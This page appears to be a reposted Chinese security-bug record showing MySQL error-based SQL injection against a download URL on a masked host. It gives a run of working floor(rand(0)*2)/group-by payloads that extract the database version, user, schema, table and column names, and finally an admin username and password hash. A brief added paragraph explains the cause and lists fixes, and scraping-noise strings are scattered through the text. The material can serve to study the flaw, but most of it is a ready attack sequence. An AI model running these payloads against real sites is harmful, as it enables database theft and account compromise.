http://www.wooyun.org/bugs/wooyun-2010-01666
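之前想找个测试,没想到这里就有,可以测试下,做个记录而已。
说明:下面的请求属于 MySQL 报错注入——URL 路径里的 id 值看起来未经处理就拼进了 SQL,`group by` 配合 `floor(rand(0)*2)` 触发的重复键错误又被原样回显,所以查询结果会出现在报错信息里。修复要从根源入手:id 强制转为整数或改用参数化查询,关闭对外的数据库错误回显,并按最小权限配置应用使用的数据库账号;另外 passwd 返回的是 32 位十六进制摘要,疑似未加盐的 MD5,应改用加盐的慢哈希算法存储。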
% s& p+ I1 S. ^" F- `http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
/data0/htdocs/leqi_new/app/myapp.php
或者:
/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- Y3 p) r# H: \1 ^. O' W
/**********user()**********/
# g4 l* J. Y; b0 B$ ^& S' ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003 x% o5 L% l+ l% A# U$ t9 P
/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********limit依次递归爆库**********/
' L, e5 _8 f$ Fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) T% q# a) R. O% E" N- X
information_schema
( ], E9 ]1 P8 ^* `# K( ^http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% M" w3 @5 Y2 f. s" ]
leqi
^5 R' ^* q4 Dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003$ L/ `* c1 I. [5 s& i/ _( F# R; p
test
/**********limit依次递归爆表名**********/
) a6 A- ]) o# phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users
/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003' D+ j. _, K, P
user_id,username,nickname,passwd,group_id
. R- P+ X2 h* h0 S# r) @http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
# r- U3 ?; l/ A/wapc/5000_0005_0033 k$ w' h* Y/ s+ V3 H
11 216 S- z8 [. j: D6 e3 D0 l2 ?
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%235 m3 x, g, g/ p
/wapc/5000_0005_003
) f4 d# A+ a. l+ W5 }5 l( t7 @11 341 351 3610 d5 l- J _$ U: K. C
/**********爆数据**********/
# v1 T t$ w% U% y: G, V) o- @5 Mhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23# h* C8 r2 i6 D; e |3 N
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
% _) A7 }/ x, ]" q0 A6a8b4574ca231eb8bd52764d4978ffcd0 `9 ]* |1 i, g8 T# `